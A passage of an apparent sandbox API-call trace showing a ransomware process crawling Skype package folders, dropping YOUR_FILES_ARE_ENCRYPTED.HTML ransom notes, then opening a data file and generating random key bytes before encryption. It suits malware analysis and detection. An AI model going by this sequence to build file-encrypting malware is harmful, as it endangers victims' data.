lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AppData" [0117.773] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AppData\\*" [0117.773] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf831b7dc, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf831b7dc, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf831b7dc, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0117.774] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf831b7dc, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf831b7dc, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf831b7dc, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0117.774] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf831b7dc, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf831b7dc, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf831b7dc, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0117.774] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0117.775] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0117.775] GetProcessHeap () returned 0x600000 [0117.775] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.skypeapp_kzf8qxf38zg5c\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0117.778] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0117.779] CloseHandle (hObject=0x324) returned 1 [0117.779] GetProcessHeap () returned 0x600000 [0117.779] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.779] GetProcessHeap () returned 0x600000 [0117.779] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0117.779] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf825cc02, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf825cc02, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf825cc02, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0117.779] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.779] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\LocalCache") returned 92 [0117.779] GetProcessHeap () returned 0x600000 [0117.779] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0117.779] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\LocalCache" [0117.779] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\LocalCache\\*" [0117.780] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf825cc02, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf825cc02, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf825cc02, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0117.780] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf825cc02, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf825cc02, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf825cc02, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0117.780] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf825cc02, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf825cc02, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf825cc02, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0117.780] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0117.780] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0117.780] GetProcessHeap () returned 0x600000 [0117.780] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.skypeapp_kzf8qxf38zg5c\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0117.781] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0117.782] CloseHandle (hObject=0x324) returned 1 [0117.782] GetProcessHeap () returned 0x600000 [0117.782] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.782] GetProcessHeap () returned 0x600000 [0117.782] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0117.782] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf825cc02, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf825cc02, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf825cc02, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0117.782] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.783] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\LocalState") returned 92 [0117.783] GetProcessHeap () returned 0x600000 [0117.783] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0117.783] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\LocalState" [0117.783] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\LocalState\\*" [0117.783] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf825cc02, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf825cc02, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf825cc02, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0117.783] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf825cc02, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf825cc02, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf825cc02, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0117.783] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf825cc02, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf825cc02, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf825cc02, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0117.783] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0117.783] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0117.783] GetProcessHeap () returned 0x600000 [0117.783] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.783] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.skypeapp_kzf8qxf38zg5c\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0117.784] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0117.785] CloseHandle (hObject=0x324) returned 1 [0117.786] GetProcessHeap () returned 0x600000 [0117.786] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.786] GetProcessHeap () returned 0x600000 [0117.786] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0117.787] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8793e8f, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8793e8f, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf87ba052, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c", cAlternateFileName="MICROS~1.0_X")) returned 1 [0117.787] StrStrIW (lpFirst="Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.787] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c") returned 127 [0117.787] GetProcessHeap () returned 0x600000 [0117.787] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0117.788] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c" [0117.788] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\*" [0117.788] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8793e8f, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8793e8f, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf87ba052, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626638 [0117.796] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8793e8f, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8793e8f, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf87ba052, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0117.796] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf87ba052, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf87ba052, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8852921, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0117.796] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.796] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\ActivationStore") returned 143 [0117.796] GetProcessHeap () returned 0x600000 [0117.796] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0117.797] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\ActivationStore" [0117.797] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\ActivationStore\\*" [0117.797] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf87ba052, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf87ba052, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8852921, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x631190, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0118.072] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf87ba052, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf87ba052, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8852921, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 1 [0118.072] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf87ba052, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8a8edde, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8a8edde, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x311bec0, dwReserved1=0x631190, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0118.072] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.072] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\ActivationStore\\ActivationStore.dat") returned 163 [0118.072] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0118.072] lstrlenW (lpString=".dat") returned 4 [0118.072] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0118.072] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0118.073] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.skypeapp_kzf8qxf38zg5c\\microsoft.skypeapp_3.2.1.0_x86__kzf8qxf38zg5c\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0118.073] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=8192) returned 1 [0118.073] GetProcessHeap () returned 0x600000 [0118.073] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0118.076] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="7F") returned 2 [0118.076] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="4A") returned 2 [0118.076] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="14") returned 2 [0118.076] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="50") returned 2 [0118.076] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="3B") returned 2 [0118.076] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="64") returned 2 [0118.076] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="DF") returned 2 [0118.076] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="FB") returned 2 [0118.076] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="A2") returned 2 [0118.076] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="1D") returned 2 [0118.076] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="C1") returned 2 [0118.077] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="7B") returned 2 [0118.077] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="10") returned 2 [0118.077] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="8A") returned 2 [0118.077] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="A4") returned 2 [0118.077] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="86") returned 2 [0118.077] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | 